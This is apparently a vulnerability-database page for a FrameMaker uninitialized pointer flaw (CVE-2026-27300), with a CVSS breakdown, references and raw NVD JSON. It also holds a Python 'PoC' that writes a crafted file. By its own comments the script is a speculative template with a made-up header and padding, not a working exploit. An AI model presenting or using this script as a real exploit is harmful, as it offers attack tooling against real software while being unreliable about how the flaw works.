CVE-2026-27300

Description

Adobe Framemaker versions 2022.8 and earlier are affected by an Access of Uninitialized Pointer vulnerability that could lead to memory exposure. An attacker could leverage this vulnerability to disclose sensitive information. Exploitation of this issue requires user interaction in that a victim must open a malicious file.

CVSS Details

CVSS Score

5.5

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:adobe:framemaker:*:*:*:*:*:*:*:* - VULNERABLE

cpe:2.3:o:microsoft:windows:-:*:*:*:*:*:*:* - NOT VULNERABLE

Adobe FrameMaker <= 2022.8

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import sys

# Proof of Concept for CVE-2026-27300
# Description: Generates a malformed file to trigger the uninitialized pointer access.
# Note: This is a generic template as specific offsets require reverse engineering.

def generate_poc(filename):
    # Simulate a header that FrameMaker might parse
    header = b'\x00\x00\x00\x00MIF'
    
    # Payload construction to potentially trigger the uninitialized pointer path
    # The exact structure depends on the internal parsing logic of FrameMaker
    payload = header + b'A' * 0x200 + b'\x00' * 0x100
    
    try:
        with open(filename, 'wb') as f:
            f.write(payload)
        print(f"[+] Malicious file generated: {filename}")
        print("[+] Open this file in Adobe FrameMaker <= 2022.8 to test the vulnerability.")
    except Exception as e:
        print(f"[-] Error creating file: {e}")

if __name__ == "__main__":
    if len(sys.argv) < 2:
        print("Usage: python poc.py <output_filename>")
    else:
        generate_poc(sys.argv[1])

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-27300
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-27300
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-27300/
[4] VulDB https://vuldb.com/cve/CVE-2026-27300
[5] https://helpx.adobe.com/security/products/framemaker/apsb26-36.html

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-27300", "sourceIdentifier": "[email protected]", "published": "2026-04-14T23:16:27.240", "lastModified": "2026-04-15T17:35:09.403", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Adobe Framemaker versions 2022.8 and earlier are affected by an Access of Uninitialized Pointer vulnerability that could lead to memory exposure. An attacker could leverage this vulnerability to disclose sensitive information. Exploitation of this issue requires user interaction in that a victim must open a malicious file."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-824"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:adobe:framemaker:*:*:*:*:*:*:*:*", "versionEndExcluding": "2022.9", "matchCriteriaId": "6943B816-3A7D-47BF-9E01-DF86C9332C19"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:o:microsoft:windows:-:*:*:*:*:*:*:*", "matchCriteriaId": "A2572D17-1DE6-457B-99CC-64AFD54487EA"}]}]}], "references": [{"url": "https://helpx.adobe.com/security/products/framemaker/apsb26-36.html", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}